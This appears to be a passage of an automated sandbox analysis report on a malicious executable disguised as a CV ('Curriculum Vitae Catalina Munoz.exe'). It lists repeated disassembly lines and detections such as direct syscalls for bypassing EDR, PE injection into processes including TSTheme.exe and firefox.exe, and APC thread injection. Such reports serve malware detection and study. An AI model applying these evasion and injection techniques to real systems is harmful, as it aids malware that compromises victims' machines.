            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]2_2_014FA9D0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]2_2_014FA9D0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]2_2_014FA9D0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]2_2_014FA9D0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]2_2_014FA9D0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015229F9 mov eax, dword ptr fs:[00000030h]2_2_015229F9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015229F9 mov eax, dword ptr fs:[00000030h]2_2_015229F9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157E9E0 mov eax, dword ptr fs:[00000030h]2_2_0157E9E0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F09AD mov eax, dword ptr fs:[00000030h]2_2_014F09AD
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F09AD mov eax, dword ptr fs:[00000030h]2_2_014F09AD
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015789B3 mov esi, dword ptr fs:[00000030h]2_2_015789B3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015789B3 mov eax, dword ptr fs:[00000030h]2_2_015789B3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015789B3 mov eax, dword ptr fs:[00000030h]2_2_015789B3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]2_2_015029A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01520854 mov eax, dword ptr fs:[00000030h]2_2_01520854
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01502840 mov ecx, dword ptr fs:[00000030h]2_2_01502840
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F4859 mov eax, dword ptr fs:[00000030h]2_2_014F4859
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F4859 mov eax, dword ptr fs:[00000030h]2_2_014F4859
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157E872 mov eax, dword ptr fs:[00000030h]2_2_0157E872
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157E872 mov eax, dword ptr fs:[00000030h]2_2_0157E872
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01586870 mov eax, dword ptr fs:[00000030h]2_2_01586870
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01586870 mov eax, dword ptr fs:[00000030h]2_2_01586870
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157C810 mov eax, dword ptr fs:[00000030h]2_2_0157C810
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152A830 mov eax, dword ptr fs:[00000030h]2_2_0152A830
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159483A mov eax, dword ptr fs:[00000030h]2_2_0159483A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159483A mov eax, dword ptr fs:[00000030h]2_2_0159483A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]2_2_01512835
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]2_2_01512835
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]2_2_01512835
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01512835 mov ecx, dword ptr fs:[00000030h]2_2_01512835
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]2_2_01512835
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]2_2_01512835
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151E8C0 mov eax, dword ptr fs:[00000030h]2_2_0151E8C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C08C0 mov eax, dword ptr fs:[00000030h]2_2_015C08C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152C8F9 mov eax, dword ptr fs:[00000030h]2_2_0152C8F9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152C8F9 mov eax, dword ptr fs:[00000030h]2_2_0152C8F9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BA8E4 mov eax, dword ptr fs:[00000030h]2_2_015BA8E4
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F0887 mov eax, dword ptr fs:[00000030h]2_2_014F0887
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157C89D mov eax, dword ptr fs:[00000030h]2_2_0157C89D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159EB50 mov eax, dword ptr fs:[00000030h]2_2_0159EB50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C2B57 mov eax, dword ptr fs:[00000030h]2_2_015C2B57
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C2B57 mov eax, dword ptr fs:[00000030h]2_2_015C2B57
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C2B57 mov eax, dword ptr fs:[00000030h]2_2_015C2B57
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C2B57 mov eax, dword ptr fs:[00000030h]2_2_015C2B57
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A4B4B mov eax, dword ptr fs:[00000030h]2_2_015A4B4B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A4B4B mov eax, dword ptr fs:[00000030h]2_2_015A4B4B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01586B40 mov eax, dword ptr fs:[00000030h]2_2_01586B40
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01586B40 mov eax, dword ptr fs:[00000030h]2_2_01586B40
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BAB40 mov eax, dword ptr fs:[00000030h]2_2_015BAB40
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01598B42 mov eax, dword ptr fs:[00000030h]2_2_01598B42
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014E8B50 mov eax, dword ptr fs:[00000030h]2_2_014E8B50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014ECB7E mov eax, dword ptr fs:[00000030h]2_2_014ECB7E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]2_2_0156EB1D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C4B00 mov eax, dword ptr fs:[00000030h]2_2_015C4B00
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151EB20 mov eax, dword ptr fs:[00000030h]2_2_0151EB20
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151EB20 mov eax, dword ptr fs:[00000030h]2_2_0151EB20
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B8B28 mov eax, dword ptr fs:[00000030h]2_2_015B8B28
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B8B28 mov eax, dword ptr fs:[00000030h]2_2_015B8B28
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F0BCD mov eax, dword ptr fs:[00000030h]2_2_014F0BCD
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F0BCD mov eax, dword ptr fs:[00000030h]2_2_014F0BCD
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F0BCD mov eax, dword ptr fs:[00000030h]2_2_014F0BCD
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159EBD0 mov eax, dword ptr fs:[00000030h]2_2_0159EBD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01510BCB mov eax, dword ptr fs:[00000030h]2_2_01510BCB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01510BCB mov eax, dword ptr fs:[00000030h]2_2_01510BCB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01510BCB mov eax, dword ptr fs:[00000030h]2_2_01510BCB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157CBF0 mov eax, dword ptr fs:[00000030h]2_2_0157CBF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151EBFC mov eax, dword ptr fs:[00000030h]2_2_0151EBFC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F8BF0 mov eax, dword ptr fs:[00000030h]2_2_014F8BF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F8BF0 mov eax, dword ptr fs:[00000030h]2_2_014F8BF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F8BF0 mov eax, dword ptr fs:[00000030h]2_2_014F8BF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A4BB0 mov eax, dword ptr fs:[00000030h]2_2_015A4BB0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A4BB0 mov eax, dword ptr fs:[00000030h]2_2_015A4BB0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500BBE mov eax, dword ptr fs:[00000030h]2_2_01500BBE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500BBE mov eax, dword ptr fs:[00000030h]2_2_01500BBE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500A5B mov eax, dword ptr fs:[00000030h]2_2_01500A5B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01500A5B mov eax, dword ptr fs:[00000030h]2_2_01500A5B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]2_2_014F6A50
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156CA72 mov eax, dword ptr fs:[00000030h]2_2_0156CA72
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0156CA72 mov eax, dword ptr fs:[00000030h]2_2_0156CA72
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159EA60 mov eax, dword ptr fs:[00000030h]2_2_0159EA60
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]2_2_0152CA6F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]2_2_0152CA6F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]2_2_0152CA6F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157CA11 mov eax, dword ptr fs:[00000030h]2_2_0157CA11
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01514A35 mov eax, dword ptr fs:[00000030h]2_2_01514A35
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01514A35 mov eax, dword ptr fs:[00000030h]2_2_01514A35
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA38 mov eax, dword ptr fs:[00000030h]2_2_0152CA38
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152CA24 mov eax, dword ptr fs:[00000030h]2_2_0152CA24
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151EA2E mov eax, dword ptr fs:[00000030h]2_2_0151EA2E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01524AD0 mov eax, dword ptr fs:[00000030h]2_2_01524AD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01524AD0 mov eax, dword ptr fs:[00000030h]2_2_01524AD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]2_2_01546ACC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]2_2_01546ACC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]2_2_01546ACC
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F0AD0 mov eax, dword ptr fs:[00000030h]2_2_014F0AD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152AAEE mov eax, dword ptr fs:[00000030h]2_2_0152AAEE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152AAEE mov eax, dword ptr fs:[00000030h]2_2_0152AAEE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01528A90 mov edx, dword ptr fs:[00000030h]2_2_01528A90
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FEA80 mov eax, dword ptr fs:[00000030h]2_2_014FEA80
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FEA80 mov eax, dword ptr fs:[00000030h]2_2_014FEA80
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtOpenKeyEx: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtQueryValueKey: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory written: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeSection loaded: NULL target: C:\Windows\SysWOW64\TSTheme.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\TSTheme.exeThread register set: target process: 7720Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\TSTheme.exeThread APC queued: target process: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exeJump to behavior
